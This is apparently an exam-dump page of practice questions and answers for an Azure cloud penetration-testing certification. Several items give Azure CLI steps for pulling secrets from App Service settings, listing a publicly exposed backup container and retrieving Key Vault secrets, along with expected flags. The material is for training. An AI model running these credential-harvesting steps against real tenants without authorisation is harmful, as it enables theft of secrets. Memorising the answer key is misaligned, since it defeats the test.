CCPenX-Az試験無料問題集「The SecOps Group Certified Cloud Pentesting eXpert - Azure 認定」

Using the previously retrieved credentials, authenticate as the App Registration within the tenant and enumerate potential lateral movement vectors. Which of the following roles is assigned to the App Registration?

解説: (GoShiken メンバーにのみ表示されます)
During App Service enumeration, you discover that the compromised user can read App Service application settings. Find the hidden flag stored in the application settings.
正解:
See the Answer in Explanation below.
Explanation:
Flag{app_settings_should_not_store_secrets}
Detailed Solution:
Query App Service settings:
az webapp config appsettings list \
--name finance-reporting-api \
--resource-group rg-prod-apps-eastus \
--output json
Search for suspicious keys:
az webapp config appsettings list \
--name finance-reporting-api \
--resource-group rg-prod-apps-eastus \
--query " [?contains(name, ' FLAG ' ) || contains(name, ' Flag ' ) || contains(name, ' SECRET ' )] " \
--output table
Expected output:
Name SlotSetting Value
---------- ------------- ----------------------------------------
APP_FLAG False Flag{app_settings_should_not_store_secrets}
The flag is:
Flag{app_settings_should_not_store_secrets}
A storage account allows public blob access. Enumerate containers and identify the public container that exposes backup files.
正解:
See the Answer in Explanation below.
Explanation:
public-backups
Detailed Solution:
Try listing containers using Azure CLI:
az storage container list \
--account-name prodreportstore01 \
--auth-mode login \
--output table
If anonymous access is allowed, test via blob endpoint:
az storage blob list \
--account-name prodreportstore01 \
--container-name public-backups \
--auth-mode key \
--output table
In a lab, you can also test the public URL pattern:
https://prodreportstore01.blob.core.windows.net/public-backups/
Expected exposed container:
public-backups
Final answer:
public-backups
A managed identity has Key Vault Secrets User access to kv-finance-prod. Enumerate secrets and retrieve the hidden flag.
正解:
See the Answer in Explanation below.
Explanation:
Flag{managed_identity_can_read_keyvault_secrets}
Detailed Solution:
List Key Vaults:
az keyvault list --output table
List secrets:
az keyvault secret list \
--vault-name kv-finance-prod \
--output table
Expected output:
Name Enabled
---------------- --------
db-password True
api-token True
internal-flag True
Retrieve the flag secret:
az keyvault secret show \
--vault-name kv-finance-prod \
--name internal-flag \
--query value \
--output tsv
Expected value:
Flag{managed_identity_can_read_keyvault_secrets}
Azure Key Vault can use Azure RBAC for secrets, keys, and certificates, including data-plane secret access.